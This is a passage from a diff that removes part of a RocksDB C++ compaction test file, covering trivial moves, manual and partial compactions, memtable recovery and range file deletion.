-    for (int i = 0; i < kNumKeysPerFile; i++) {
-      ASSERT_OK(Put(2, Key(i), ""));
-    }
-    // put extra key to trigger flush
-    ASSERT_OK(Put(2, "", ""));
-    dbfull()->TEST_WaitForFlushMemTable(handles_[2]);
-    ASSERT_EQ(options.level0_file_num_compaction_trigger + num + 1,
-              NumTableFilesAtLevel(0, 2));
-  }
-  ASSERT_EQ(3, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-
-  // Unblock all threads to unblock all compactions.
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    sleeping_tasks[i].WakeUp();
-    sleeping_tasks[i].WaitUntilDone();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // Verify number of compactions allowed will come back to 1.
-
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    sleeping_tasks[i].Reset();
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                   &sleeping_tasks[i], Env::Priority::LOW);
-    sleeping_tasks[i].WaitUntilSleeping();
-  }
-  for (int cf = 0; cf < 4; cf++) {
-    for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-      for (int i = 0; i < kNumKeysPerFile; i++) {
-        ASSERT_OK(Put(cf, Key(i), ""));
-      }
-      // put extra key to trigger flush
-      ASSERT_OK(Put(cf, "", ""));
-      dbfull()->TEST_WaitForFlushMemTable(handles_[cf]);
-      ASSERT_EQ(NumTableFilesAtLevel(0, cf), num + 1);
-    }
-  }
-
-  // Now all column families qualify compaction but only one should be
-  // scheduled, because no column family hits speed up condition.
-  ASSERT_EQ(1, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-
-  for (size_t i = 0; i < kTotalTasks; i++) {
-    sleeping_tasks[i].WakeUp();
-    sleeping_tasks[i].WaitUntilDone();
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, CompactionsGenerateMultipleFiles) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;        // Large write buffer
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-
-  // Write 8MB (80 values, each 100K)
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  std::vector<std::string> values;
-  for (int i = 0; i < 80; i++) {
-    values.push_back(RandomString(&rnd, 100000));
-    ASSERT_OK(Put(1, Key(i), values[i]));
-  }
-
-  // Reopening moves updates to level-0
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1],
-                              true /* disallow trivial move */);
-
-  ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-  ASSERT_GT(NumTableFilesAtLevel(1, 1), 1);
-  for (int i = 0; i < 80; i++) {
-    ASSERT_EQ(Get(1, Key(i)), values[i]);
-  }
-}
-
-TEST_F(DBCompactionTest, MinorCompactionsHappen) {
-  do {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 10000;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    const int N = 500;
-
-    int starting_num_tables = TotalTableFiles(1);
-    for (int i = 0; i < N; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i) + std::string(1000, 'v')));
-    }
-    int ending_num_tables = TotalTableFiles(1);
-    ASSERT_GT(ending_num_tables, starting_num_tables);
-
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ(Key(i) + std::string(1000, 'v'), Get(1, Key(i)));
-    }
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ(Key(i) + std::string(1000, 'v'), Get(1, Key(i)));
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBCompactionTest, UserKeyCrossFile1) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-
-  DestroyAndReopen(options);
-
-  // create first file and flush to l0
-  Put("4", "A");
-  Put("3", "A");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  Put("2", "A");
-  Delete("3");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  // move both files down to l1
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  for (int i = 0; i < 3; i++) {
-    Put("2", "B");
-    Flush();
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-}
-
-TEST_F(DBCompactionTest, UserKeyCrossFile2) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-
-  DestroyAndReopen(options);
-
-  // create first file and flush to l0
-  Put("4", "A");
-  Put("3", "A");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  Put("2", "A");
-  SingleDelete("3");
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  // move both files down to l1
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-
-  for (int i = 0; i < 3; i++) {
-    Put("2", "B");
-    Flush();
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ("NOT_FOUND", Get("3"));
-}
-
-TEST_F(DBCompactionTest, ZeroSeqIdCompaction) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  // compaction options
-  CompactionOptions compact_opt;
-  compact_opt.compression = kNoCompression;
-  compact_opt.output_file_size_limit = 4096;
-  const size_t key_len =
-    static_cast<size_t>(compact_opt.output_file_size_limit) / 5;
-
-  DestroyAndReopen(options);
-
-  std::vector<const Snapshot*> snaps;
-
-  // create first file and flush to l0
-  for (auto& key : {"1", "2", "3", "3", "3", "3"}) {
-    Put(key, std::string(key_len, 'A'));
-    snaps.push_back(dbfull()->GetSnapshot());
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  // create second file and flush to l0
-  for (auto& key : {"3", "4", "5", "6", "7", "8"}) {
-    Put(key, std::string(key_len, 'A'));
-    snaps.push_back(dbfull()->GetSnapshot());
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  // move both files down to l1
-  dbfull()->CompactFiles(compact_opt, collector->GetFlushedFiles(), 1);
-
-  // release snap so that first instance of key(3) can have seqId=0
-  for (auto snap : snaps) {
-    dbfull()->ReleaseSnapshot(snap);
-  }
-
-  // create 3 files in l0 so to trigger compaction
-  for (int i = 0; i < options.level0_file_num_compaction_trigger; i++) {
-    Put("2", std::string(1, 'A'));
-    Flush();
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_OK(Put("", ""));
-}
-
-TEST_F(DBCompactionTest, ManualCompactionUnknownOutputSize) {
-  // github issue #2249
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 3;
-  DestroyAndReopen(options);
-
-  // create two files in l1 that we can compact
-  for (int i = 0; i < 2; ++i) {
-    for (int j = 0; j < options.level0_file_num_compaction_trigger; j++) {
-      // make l0 files' ranges overlap to avoid trivial move
-      Put(std::to_string(2 * i), std::string(1, 'A'));
-      Put(std::to_string(2 * i + 1), std::string(1, 'A'));
-      Flush();
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);
-    ASSERT_EQ(NumTableFilesAtLevel(1, 0), i + 1);
-  }
-
-  ColumnFamilyMetaData cf_meta;
-  dbfull()->GetColumnFamilyMetaData(dbfull()->DefaultColumnFamily(), &cf_meta);
-  ASSERT_EQ(2, cf_meta.levels[1].files.size());
-  std::vector<std::string> input_filenames;
-  for (const auto& sst_file : cf_meta.levels[1].files) {
-    input_filenames.push_back(sst_file.name);
-  }
-
-  // note CompactionOptions::output_file_size_limit is unset.
-  CompactionOptions compact_opt;
-  compact_opt.compression = kNoCompression;
-  dbfull()->CompactFiles(compact_opt, input_filenames, 1);
-}
-
-// Check that writes done during a memtable compaction are recovered
-// if the database is shutdown during the memtable compaction.
-TEST_F(DBCompactionTest, RecoverDuringMemtableCompaction) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Trigger a long memtable compaction and reopen the database during it
-    ASSERT_OK(Put(1, "foo", "v1"));  // Goes to 1st log file
-    ASSERT_OK(Put(1, "big1", std::string(10000000, 'x')));  // Fills memtable
-    ASSERT_OK(Put(1, "big2", std::string(1000, 'y')));  // Triggers compaction
-    ASSERT_OK(Put(1, "bar", "v2"));                     // Goes to new log file
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v2", Get(1, "bar"));
-    ASSERT_EQ(std::string(10000000, 'x'), Get(1, "big1"));
-    ASSERT_EQ(std::string(1000, 'y'), Get(1, "big2"));
-  } while (ChangeOptions());
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveOneFile) {
-  int32_t trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  int32_t num_keys = 80;
-  int32_t value_size = 100 * 1024;  // 100 KB
-
-  Random rnd(301);
-  std::vector<std::string> values;
-  for (int i = 0; i < num_keys; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-
-  // Reopening moves updates to L0
-  Reopen(options);
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 1);  // 1 file in L0
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 0);  // 0 files in L1
-
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 1U);
-  LiveFileMetaData level0_file = metadata[0];  // L0 file meta
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-
-  // Compaction will initiate a trivial move from L0 to L1
-  dbfull()->CompactRange(cro, nullptr, nullptr);
-
-  // File moved From L0 to L1
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);  // 0 files in L0
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 1);  // 1 file in L1
-
-  metadata.clear();
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 1U);
-  ASSERT_EQ(metadata[0].name /* level1_file.name */, level0_file.name);
-  ASSERT_EQ(metadata[0].size /* level1_file.size */, level0_file.size);
-
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-
-  ASSERT_EQ(trivial_move, 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveNonOverlappingFiles) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  // non overlapping ranges
-  std::vector<std::pair<int32_t, int32_t>> ranges = {
-    {100, 199},
-    {300, 399},
-    {0, 99},
-    {200, 299},
-    {600, 699},
-    {400, 499},
-    {500, 550},
-    {551, 599},
-  };
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  int32_t level0_files = NumTableFilesAtLevel(0, 0);
-  ASSERT_EQ(level0_files, ranges.size());    // Multiple files in L0
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 0);  // No files in L1
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-
-  // Since data is non-overlapping we expect compaction to initiate
-  // a trivial move
-  db_->CompactRange(cro, nullptr, nullptr);
-  // We expect that all the files were trivially moved from L0 to L1
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0) /* level1_files */, level0_files);
-
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      ASSERT_EQ(Get(Key(j)), values[j]);
-    }
-  }
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  trivial_move = 0;
-  non_trivial_move = 0;
-  values.clear();
-  DestroyAndReopen(options);
-  // Same ranges as above but overlapping
-  ranges = {
-    {100, 199},
-    {300, 399},
-    {0, 99},
-    {200, 299},
-    {600, 699},
-    {400, 499},
-    {500, 560},  // this range overlap with the next one
-    {551, 599},
-  };
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  db_->CompactRange(cro, nullptr, nullptr);
-
-  for (size_t i = 0; i < ranges.size(); i++) {
-    for (int32_t j = ranges[i].first; j <= ranges[i].second; j++) {
-      ASSERT_EQ(Get(Key(j)), values[j]);
-    }
-  }
-  ASSERT_EQ(trivial_move, 0);
-  ASSERT_EQ(non_trivial_move, 1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveTargetLevel) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.num_levels = 7;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 300]
-  for (int32_t i = 0; i <= 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [600 => 700]
-  for (int32_t i = 600; i <= 700; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 6;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L6
-  ASSERT_EQ("0,0,0,0,0,0,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  for (int32_t i = 0; i <= 300; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-  for (int32_t i = 600; i <= 700; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  bool first = true;
-  // Purpose of dependencies:
-  // 4 -> 1: ensure the order of two non-trivial compactions
-  // 5 -> 2 and 5 -> 3: ensure we do a check before two non-trivial compactions
-  // are installed
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBCompaction::ManualPartial:4", "DBCompaction::ManualPartial:1"},
-       {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:2"},
-       {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (first) {
-          first = false;
-          TEST_SYNC_POINT("DBCompaction::ManualPartial:4");
-          TEST_SYNC_POINT("DBCompaction::ManualPartial:3");
-        } else {  // second non-trivial compaction
-          TEST_SYNC_POINT("DBCompaction::ManualPartial:2");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.num_levels = 7;
-  options.max_subcompactions = max_subcompactions_;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-  options.target_file_size_base = 1 << 23;  // 8 MB
-
-  DestroyAndReopen(options);
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 100]
-  for (int32_t i = 0; i < 100; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [100 => 300]
-  for (int32_t i = 100; i < 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 6;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  // Trivial move the two non-overlapping files to level 6
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L6
-  ASSERT_EQ("0,0,0,0,0,0,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // file 3 [ 0 => 200]
-  for (int32_t i = 0; i < 200; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 1 files in L0
-  ASSERT_EQ("1,0,0,0,0,0,2", FilesPerLevel(0));
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(1, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(2, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(3, nullptr, nullptr, nullptr, false));
-  ASSERT_OK(dbfull()->TEST_CompactRange(4, nullptr, nullptr, nullptr, false));
-  // 2 files in L6, 1 file in L5
-  ASSERT_EQ("0,0,0,0,0,1,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 6);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  rocksdb::port::Thread threads([&] {
-    compact_options.change_level = false;
-    compact_options.exclusive_manual_compaction = false;
-    std::string begin_string = Key(0);
-    std::string end_string = Key(199);
-    Slice begin(begin_string);
-    Slice end(end_string);
-    // First non-trivial compaction is triggered
-    ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  });
-
-  TEST_SYNC_POINT("DBCompaction::ManualPartial:1");
-  // file 4 [300 => 400)
-  for (int32_t i = 300; i <= 400; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 5 [400 => 500)
-  for (int32_t i = 400; i <= 500; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 6 [500 => 600)
-  for (int32_t i = 500; i <= 600; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  // Second non-trivial compaction is triggered
-  ASSERT_OK(Flush());
-
-  // Before two non-trivial compactions are installed, there are 3 files in L0
-  ASSERT_EQ("3,0,0,0,0,1,2", FilesPerLevel(0));
-  TEST_SYNC_POINT("DBCompaction::ManualPartial:5");
-
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  // After two non-trivial compactions are installed, there is 1 file in L6, and
-  // 1 file in L1
-  ASSERT_EQ("0,1,0,0,0,0,1", FilesPerLevel(0));
-  threads.join();
-
-  for (int32_t i = 0; i < 600; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-}
-
-// Disable as the test is flaky.
-TEST_F(DBCompactionTest, DISABLED_ManualPartialFill) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  bool first = true;
-  bool second = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBCompaction::PartialFill:4", "DBCompaction::PartialFill:1"},
-       {"DBCompaction::PartialFill:2", "DBCompaction::PartialFill:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (first) {
-          TEST_SYNC_POINT("DBCompaction::PartialFill:4");
-          first = false;
-          TEST_SYNC_POINT("DBCompaction::PartialFill:3");
-        } else if (second) {
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.max_bytes_for_level_multiplier = 2;
-  options.num_levels = 4;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-
-  DestroyAndReopen(options);
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 100]
-  for (int32_t i = 0; i < 100; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [100 => 300]
-  for (int32_t i = 100; i < 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L2
-  ASSERT_EQ("0,0,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // file 3 [ 0 => 200]
-  for (int32_t i = 0; i < 200; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L2, 1 in L0
-  ASSERT_EQ("1,0,2", FilesPerLevel(0));
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr, nullptr, false));
-  // 2 files in L2, 1 in L1
-  ASSERT_EQ("0,1,2", FilesPerLevel(0));
-
-  ASSERT_EQ(trivial_move, 2);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  rocksdb::port::Thread threads([&] {
-    compact_options.change_level = false;
-    compact_options.exclusive_manual_compaction = false;
-    std::string begin_string = Key(0);
-    std::string end_string = Key(199);
-    Slice begin(begin_string);
-    Slice end(end_string);
-    ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  });
-
-  TEST_SYNC_POINT("DBCompaction::PartialFill:1");
-  // Many files 4 [300 => 4300)
-  for (int32_t i = 0; i <= 5; i++) {
-    for (int32_t j = 300; j < 4300; j++) {
-      if (j == 2300) {
-        ASSERT_OK(Flush());
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-  }
-
-  // Verify level sizes
-  uint64_t target_size = 4 * options.max_bytes_for_level_base;
-  for (int32_t i = 1; i < options.num_levels; i++) {
-    ASSERT_LE(SizeAtLevel(i), target_size);
-    target_size = static_cast<uint64_t>(target_size *
-                                        options.max_bytes_for_level_multiplier);
-  }
-
-  TEST_SYNC_POINT("DBCompaction::PartialFill:2");
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  threads.join();
-
-  for (int32_t i = 0; i < 4300; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-}
-
-TEST_F(DBCompactionTest, DeleteFileRange) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.max_bytes_for_level_multiplier = 2;
-  options.num_levels = 4;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-
-  DestroyAndReopen(options);
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 100]
-  for (int32_t i = 0; i < 100; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [100 => 300]
-  for (int32_t i = 100; i < 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L2
-  ASSERT_EQ("0,0,2", FilesPerLevel(0));
-
-  // file 3 [ 0 => 200]
-  for (int32_t i = 0; i < 200; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // Many files 4 [300 => 4300)
-  for (int32_t i = 0; i <= 5; i++) {
-    for (int32_t j = 300; j < 4300; j++) {
-      if (j == 2300) {
-        ASSERT_OK(Flush());
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-  }
-  ASSERT_OK(Flush());
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Verify level sizes
-  uint64_t target_size = 4 * options.max_bytes_for_level_base;
-  for (int32_t i = 1; i < options.num_levels; i++) {
-    ASSERT_LE(SizeAtLevel(i), target_size);
-    target_size = static_cast<uint64_t>(target_size *
-                                        options.max_bytes_for_level_multiplier);
-  }
-
-  size_t old_num_files = CountFiles();
-  std::string begin_string = Key(1000);
-  std::string end_string = Key(2000);
-  Slice begin(begin_string);
-  Slice end(end_string);
-  ASSERT_OK(DeleteFilesInRange(db_, db_->DefaultColumnFamily(), &begin, &end));
-
-  int32_t deleted_count = 0;
-  for (int32_t i = 0; i < 4300; i++) {
-    if (i < 1000 || i > 2000) {
-      ASSERT_EQ(Get(Key(i)), values[i]);
-    } else {
-      ReadOptions roptions;
-      std::string result;
-      Status s = db_->Get(roptions, Key(i), &result);
-      ASSERT_TRUE(s.IsNotFound() || s.ok());
-      if (s.IsNotFound()) {
-        deleted_count++;
-      }
-    }
-  }
-  ASSERT_GT(deleted_count, 0);
-  begin_string = Key(5000);
-  end_string = Key(6000);
-  Slice begin1(begin_string);
-  Slice end1(end_string);
-  // Try deleting files in range which contain no keys
-  ASSERT_OK(
